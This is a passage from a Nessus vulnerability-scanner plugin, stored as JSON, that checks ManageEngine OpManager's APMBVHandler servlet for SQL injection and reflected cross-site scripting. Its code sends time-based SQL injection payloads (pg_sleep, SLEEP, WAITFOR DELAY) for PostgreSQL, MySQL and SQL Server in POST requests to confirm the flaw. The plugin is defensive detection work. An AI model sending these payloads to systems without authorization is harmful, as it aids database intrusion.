An\n unauthenticated, remote attacker can exploit this to\n modify the application's database and potentially gain\n administrative rights. (CVE-2014-7868 / CVE-2016-82014)\n\n - A reflected cross-site scripting (XSS) vulnerability\n exists due to improper validation of user-supplied input\n to the 'OPM_BVNAME' parameter of the APMBVHandler\n servlet. A context-dependent attacker can exploit this,\n via a specially crafted request, to execute arbitrary\n script code in a user's browser session.\n (CVE-2016-82015)\n\nNote that additional SQL injection vulnerabilities exist; however,\nNessus has not tested for these.\");\n # https://pitstop.manageengine.com/portal/kb/articles/sql-injection-vulnerability-fix\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f9f0ae00\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/research/tra-2016-10\");\n script_set_attribute(attribute:\"solution\", value:\n\"Zoho has released a patch for ManageEngine OpManager versions 11.3,\n11.4, and 11.5; however, the patch is only a partial fix. 
Upgrade to\nOpManager version 11.6 for the full fix.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/08/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zohocorp:manageengine_opmanager\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n\n script_dependencies(\"manageengine_opmanager_detect.nbin\");\n script_require_keys(\"installed_sw/ManageEngine OpManager\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\ninclude(\"http.inc\");\ninclude(\"url_func.inc\");\n\nappname = \"ManageEngine OpManager\";\n# Stops get_http_port from branching\nget_install_count(app_name:appname, exit_if_zero:TRUE);\n\nport = get_http_port(default:80);\ninstall = get_single_install(app_name:appname,port:port); # Can be launched against unknown version\nversion = install['version'];\nbuild = install['build' ];\nurl = build_url(port:port,qs:install['path']);\nitem = \"/servlet/APMBVHandler\";\npostdat = \"OPERATION_TYPE=Delete&OPM_BVNAME=\"+rand_str(length:3)+\"'%3b\";\nvariance = 4; # Variance allowed in response time\ntimings = make_list(15,20); # Seconds to sleep for test\ncmds = make_list( # To figure out what the db 
backend is\n \"+SELECT+pg_sleep(%TIMING%)%3b--+\", # Postgres\n \"+SELECT+SLEEP(%TIMING%)%3b--+\", # MySQL\n \"+WAITFOR+DELAY+'00:00:%TIMING%'%3b--+\" # SQL Server\n);\n\nrequests = make_list();\noutput = NULL;\ntiming = 10;\nnopatch = FALSE;\n\n# Only use \"ViewName\" as a sign that the system\n# hasn't been patched for the XSS for unknown\n# versions or versions less than 11.5\nchkpatch = (version == UNKNOWN_VER);\nif(!chkpatch)\n chkpatch = (ver_compare(ver:version,fix:\"11.5\",strict:FALSE) < 0);\n\n# Find out which db backend we're using\nforeach cmd (cmds)\n{\n http_set_read_timeout(timing*3+variance);\n then = unixtime();\n res = http_send_recv3(\n method : \"POST\",\n item : item,\n add_headers : make_array(\"Content-Type\",\"application/x-www-form-urlencoded\"),\n data : postdat+ereg_replace(pattern:\"%TIMING%\",replace:timing,string:cmd),\n port : port,\n exit_on_fail : TRUE\n );\n now = unixtime();\n\n realtime = timing;\n # No patch at all, query runs 3 times, with 'patch' it runs once\n #\n # 2015/04/05 : Version 11.5 has a variation of this patch that \n # reintroduces ViewName but protects it from being used for XSS\n if(\"ViewName\" >< res[2] && chkpatch)\n {\n realtime = timing*3;\n nopatch = TRUE;\n }\n\n # Found back-end\n delta = now-then;\n if(delta >= realtime && delta < realtime+variance)\n {\n postdat += cmd;\n requests = make_list(requests, http_last_sent_request());\n output += res[0]+'(Response was delayed by '+delta+' seconds)\\n';\n break;\n }\n}\n\n# First test failed\nif(empty_or_null(requests))\n audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, url);\n\n# Try 2 more timings to confirm\nforeach timing (timings)\n{\n realtime = timing;\n if(nopatch) realtime = timing*3;\n\n http_set_read_timeout(realtime+variance);\n then = unixtime();\n res = http_send_recv3(\n method : \"POST\",\n item : item,\n add_headers : make_array(\"Content-Type\",\"application/x-www-form-urlencoded\"),\n data : 
ereg_replace(pattern:\"%TIMING%\",replace:timing,string:postdat),\n port : port,\n exit_on_fail : TRUE\n );\n now = unixtime();\n\n # Test failed\n delta = now-then;\n if(delta < realtime || delta > realtime+variance)\n audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, url);\n\n # Test passed\n requests = make_list(requests, http_last_sent_request());\n output += res[0]+'(Response was delayed by '+delta+' seconds)\\n';\n}\n\nrep_extra = NULL;\nif(nopatch)\n rep_extra = 'Nessus determined that server is completely unpatched. Each injection' + '\\n' +\n 'runs three times per request and the servlet contains the reflected' + '\\n' +\n 'XSS flaw.';\n\n# If we make it here all 3 tests passed\nsecurity_report_v4(\n port : port,\n request : requests,\n output : chomp(output),\n rep_extra : rep_extra,\n severity : SECURITY_HOLE,\n generic : TRUE,\n sqli : TRUE,\n xss : nopatch # XSS Only present if no patch applied\n);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}